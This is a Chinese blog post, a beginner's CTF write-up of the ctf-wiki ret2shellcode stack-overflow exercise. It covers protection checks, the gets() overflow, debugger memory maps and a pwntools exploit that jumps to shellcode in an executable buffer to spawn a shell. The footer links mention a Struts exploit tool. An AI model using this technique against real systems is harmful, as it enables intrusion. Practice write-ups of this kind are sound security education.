pwn基础之ctfwiki-栈溢出-基础ROP-ret2shellcode

最新推荐文章于 2023-11-16 22:23:17 发布
最新推荐文章于 2023-11-16 22:23:17 发布
阅读量1.1k 收藏 5
点赞数 3
分类专栏: 笔记 文章标签: 安全 ubuntu python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52658640/article/details/116012058
版权

文章目录

前言

二进制小白的学习记录,是自己写的第二篇文章,相较于第一篇文章我也做了一些改进,希望会越来越好。也希望二进制大佬们及时斧正文章的错误。

原理

ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码。

在栈溢出的基础上,要想执行 shellcode,需要对应的 binary 在运行时,shellcode 所在的区域具有可执行权限。

ret2shellcode

挖掘漏洞

首先我们再ubuntu下利用checksec命令去检查可执行文件的保护情况

    ret2shellcode checksec ret2shellcode
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

发现文件并没有开启任何的保护,源程序存在可读,可写,可执行段。那么我们用ida反编译器来分析一下源程序。

我们按照分析的流程首先打开main函数并查看其源代码,main函数源代码如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+1Ch] [bp-64h]@1

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No system for you this time !!!");
  gets((char *)&v4);
  strncpy(buf2, (const char *)&v4, 0x64u);
  printf("bye bye ~");
  return 0;
}

在源代码中我们看到了gets函数,gets函数是一个有关栈溢出的危险函数,此函数只接受输入但不对接受内容的长度进行校验,这就形成了栈溢出。

但是这次多的一个是将get到的内容复制到buf2,那么思路来了。因为没有开启NX保护(堆栈不可执行保护),大部分字段应该有可执行权限的,那么我们可以写入一段shellcode复制到buf2段去执行。

这样的话需要我们确认buf2段是否有执行权限,以及获取buf2的地址用来覆盖栈的返回地址。

利用漏洞

.bss:0804A080                 public buf2
.bss:0804A080 ; char buf2[100]

发现buf2是在.bss段地址为0x0804A080
接下来就用gdb下的peda插件去动态调试一下程序。

gef➤  b main
Breakpoint 1 at 0x8048536: file ret2shellcode.c, line 8.
gef➤  r
Starting program: /mnt/hgfs/Hack/CTF-Learn/pwn/stack/example/ret2shellcode/ret2shellcode 

Breakpoint 1, main () at ret2shellcode.c:8
8       setvbuf(stdout, 0LL, 2, 0LL);
─────────────────────────────────────────────────────────────────────[ source:ret2shellcode.c+8 ]────
      6  int main(void)
      7  {
 →    8      setvbuf(stdout, 0LL, 2, 0LL);
      9      setvbuf(stdin, 0LL, 1, 0LL);
     10  
─────────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0x8048536 → Name: main()
─────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  vmmap 
Start      End        Offset     Perm Path
0x08048000 0x08049000 0x00000000 r-x /mnt/hgfs/Hack/CTF-Learn/pwn/stack/example/ret2shellcode/ret2shellcode
0x08049000 0x0804a000 0x00000000 r-x /mnt/hgfs/Hack/CTF-Learn/pwn/stack/example/ret2shellcode/ret2shellcode
0x0804a000 0x0804b000 0x00001000 rwx /mnt/hgfs/Hack/CTF-Learn/pwn/stack/example/ret2shellcode/ret2shellcode
0xf7dfc000 0xf7fab000 0x00000000 r-x /lib/i386-linux-gnu/libc-2.23.so
0xf7fab000 0xf7fac000 0x001af000 --- /lib/i386-linux-gnu/libc-2.23.so
0xf7fac000 0xf7fae000 0x001af000 r-x /lib/i386-linux-gnu/libc-2.23.so
0xf7fae000 0xf7faf000 0x001b1000 rwx /lib/i386-linux-gnu/libc-2.23.so
0xf7faf000 0xf7fb2000 0x00000000 rwx 
0xf7fd3000 0xf7fd5000 0x00000000 rwx 
0xf7fd5000 0xf7fd7000 0x00000000 r-- [vvar]
0xf7fd7000 0xf7fd9000 0x00000000 r-x [vdso]
0xf7fd9000 0xf7ffb000 0x00000000 r-x /lib/i386-linux-gnu/ld-2.23.so
0xf7ffb000 0xf7ffc000 0x00000000 rwx 
0xf7ffc000 0xf7ffd000 0x00022000 r-x /lib/i386-linux-gnu/ld-2.23.so
0xf7ffd000 0xf7ffe000 0x00023000 rwx /lib/i386-linux-gnu/ld-2.23.so
0xfffdd000 0xffffe000 0x00000000 rwx [stack]

利用vmmap就可以查看.bss段的可执行权限的分布。buf2的地址为0x0804A080,观察可知buf2存在于0x0804a000——0x0804b000段内。根据显示rwx,表示该段可读、可写、可执行。

0x0804a000 0x0804b000 0x00001000 rwx /mnt/hgfs/Hack/CTF-Learn/pwn/stack/example/ret2shellcode/ret2shellcode

那么来说我们在上文所提到的思路可行。

计算偏移量的方法与本人上一篇文章ret2text方法一致,也可以说ret2shellcode是ret2text的进阶版本,以后的文章还会不断进阶。

利用脚本(exp)

from pwn import *

sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x0804A080
payload = shellcode.ljust(112, 'A') + p32(buf2_addr)

sh.sendline(payload)
sh.interactive()

总结

总的来说,这篇文章将我初学时所遇到的问题加以解释,希望可以帮助到入门大佬。这些知识点知识我们在学习道路上的星星点点,还需要我们将知识汇成大海啊。

参考文章链接: https://ctf-wiki.org/pwn/linux/stackoverflow/basic-rop/.

大能猫能
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
跟着CTF-wikipwn——ret2shellcode
qq_42882717的博客
07-01 764
CTF-wiki的注解:ret2shellcode
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
CTF-PWN-栈溢出-基本ROP-【ret2shellcode
最新发布
llovewuzhengzi的博客
11-16 134
C 库函数 int atoi(const char *str) 把参数 str 所指向的字符串转换为一个整数(类型为 int 型)。栈溢出,同时栈上可执行,利用泄露的buf地址作为返回地址,同时将shellcode写入buf。这里read存在栈溢出,同时第一个fprintf输出了buf的地址。Has RWX segments提示有可读可写可执行的段。接受字节‘0x ……’的处理,先化整型然后p64处理。shellcode一个不行就换下一个。控制程序去执行我们自己填充的代码。
ret2shellcode
qq_45691294的博客
12-18 4629
shellcode的含义: 在栈溢出的攻击技术中通常是要控制函数的返回地址到自己想要的地方执行自己想要执行的代码。ret2shellcode代表返回到shellcode中即控制函数的返回地址到预先设定好的shellcode区域中去执行shellcode代码,这是非常危险的。 这里学习一下shellcode的利用方式,用ret2shellcode作为例题 先用checksec查看一下保护,可以看到,没有开启任何保护机制,且是一个32位的程序 使用IDA分析程序,只发现了主函数,并没有发现后门函数 get
CTFHUB-PWN-ret2shellcode
m0_64180167的博客
04-16 856
几个大方向的思路:没有PIE:ret2libcNX关闭:ret2shellcode其他思路:ret2csu、ret2text 【程序本身有先检查开了什么保护没有开保护 并且是64 的放入ida64查看字符串发现没有shell我们看看主函数发现有read函数 但是没有shell我们现在要确定一些信息。
ctf-wiki基本ROP2-ret2shellcode学习笔记
m0_58824086的博客
09-03 359
shellcode的长度为44,而IDA告诉我们,s的首地址 = ebp - 64h,如果再加上ebp_of_caller本身的4字节则会有s的首地址 = &return_address - 68h。而vmmap告诉我们,地址在0x804a000~0x804b000的内容是可读、可写,因此bss段和data段也是可读、可写的。但这题非常特殊,IDA提供给我们的数据是错误的(一般情况下是正确的),当IDA和gdb计算偏移值有冲突时,应当以gdb为准。r(Read,读取):对文件而言,具有读取文件内容的权限;
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
CTFHub[PWN技能树]——栈溢出
mcmuyanga的博客
12-19 2298
文章目录一、ret2text二、ret2shellcode 一、ret2text 例行检查,64位程序,没有开启任何保护 本地运行一下情况,看看大概的情况 64位ida载入,检索程序里的字符串发现了bin/sh 要满足条件才可以执行,但是我们可以直接跳转到0x4007B8去system(‘/bin/sh’) 看main函数 第8行,gets函数读入没有限制数据的长度,明显的溢出,溢出ret到执行system(‘/bin/sh’)的地址即可 from pwn import * #p=proc
CTF wiki基础部分学习总结
m0_57754423的博客
03-04 899
基本rop: ret2rext: 利用程序中已有的代码段。 main函数后一般跟都有leave ret; leave-> mov esp ebp;pop ebp; 函数返回值会保存在rax中; 32位程序传参是通过栈进行传参的,call一个函数的时候,此时esp所指向的位置是第一个参数,esp+4的位置是第二个参数,依次类推后跟下次函数的返回地址。 and 指令 :相同为1,不同为0。 ret2shellcode: 一般这种题目都会有rwx段,我们可以在该段内写入shellcode
[二进制安全学习]ret2shellcode
Y4tacker的博客
07-15 1112
文章目录写在前面ret2shellcode利用原理利用关键例题参考文章 写在前面 懒狗的第二篇学习,开冲 ret2shellcode 利用原理 ret2shellcode,即控制程序执行 shellcode 代码。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码。 在栈溢出基础上,要想执行 shellcode,需要对应的 binary 在运行时,shellcode 所在的区域具有可执行权限。 利用关键 1、程序存在溢出,并且还要能够控
CTF-PWN笔记(一)-- 栈溢出基础ROP
CK_0ff的博客
01-09 4385
文章目录栈linux内存布局原理文件保护机制CanaryNXPIE(ASLR)RELRO简单的栈溢出(ret2txt)ret2shellcode 栈 栈是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压栈 (push) 与出栈 (pop) 两种操作,如下图所示(维基百科)。两种操作都操作栈顶,当然,它也有栈底。 高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的栈,用于保存
Ret2ShellCode
钞sir的博客
01-24 8153
红颜祸 千般柔情 相思难解两相若 蝶恋花 几经浮沉 枯骨终是化飞沙 简介 ret2shellcode顾名思义,就是return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcode,得到system(sh)的效果;ret2shellcode栈溢出中一种简单而且常规的操作,当配合ROP等技术的使用后,非常有用 利用条件 ret2shel...
CTF-PWN-栈溢出-【原理】
llovewuzhengzi的博客
11-13 122
溢出是指某个变量中写入的字节数超过了这个变量本身所申请的字节数,导致与其相邻的变量的值被改变。
pwn 暑假复习二 简单rop
SsMing的博客
07-14 2056
例一:ret2shellcode 先复习一下计算与ebp的距离的方法,昨天复习的是用pattern来寻找,今天复习另一种,以ctfwiki的ret2text为例。先用ida打开查看源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvb...
好好说话之ret2shellcode
hollk’s blog
06-22 1717
本题为ret2shellcode-example 题目路径 /ctf-challenges/pwn/stackoverflow/ret2shellcode/ret2shellcode-example 一、原理 ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shell...
CTF-PWN练习之执行Shellcode
WateranFire的博客
09-19 2989
Shellcode 的执行可以通过制造溢出修改函数的返回地址,转为执行Shellcodepython文件的输出导入文件test: python xxx.py > test 在gdb中将test 的内容作为输入并运行程序至断点处: r 将test文件的内容作为xxx程序的输入,执行xxx程序: ./xxx
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值